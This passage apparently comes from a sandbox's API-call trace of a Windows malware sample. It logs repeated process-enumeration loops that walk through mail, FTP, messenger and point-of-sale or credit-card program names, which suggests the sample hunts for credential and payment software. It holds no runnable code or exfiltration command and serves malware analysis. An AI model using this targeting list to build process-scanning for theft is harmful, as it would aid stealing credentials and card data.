cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0245.831] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0245.833] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0245.846] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0245.849] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0245.852] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0245.855] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0245.857] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0245.859] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0245.861] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0245.864] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0245.866] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0245.869] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0245.872] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0245.875] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0245.878] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0245.880] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0245.883] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0245.902] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0245.905] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0245.907] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0245.910] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0245.914] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0245.918] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0245.920] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0245.923] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0245.928] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0245.934] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0245.938] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0245.971] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0245.973] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0245.975] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0245.978] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0245.981] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0245.984] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0245.986] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0245.988] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0245.991] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0245.993] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0245.996] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0245.998] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0246.000] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0246.003] CloseHandle (hObject=0x2234) returned 1 [0246.003] Sleep (dwMilliseconds=0x64) [0246.139] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2318 [0246.179] Process32First (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.182] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0246.184] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0246.187] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.189] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0246.192] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.194] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0246.197] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0246.199] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0246.257] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.260] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.262] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0246.264] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.267] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.269] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.272] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.274] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.277] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.279] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.282] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0246.284] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0246.286] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.289] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0246.401] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.404] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0246.406] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0246.409] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0246.411] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0246.414] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0246.417] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0246.420] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.423] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0246.425] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0246.428] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0246.430] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.434] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0246.437] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0246.442] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0246.445] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0246.447] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0246.450] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0246.452] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0246.454] Process32Next (in: hSnapshot=0x2318, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 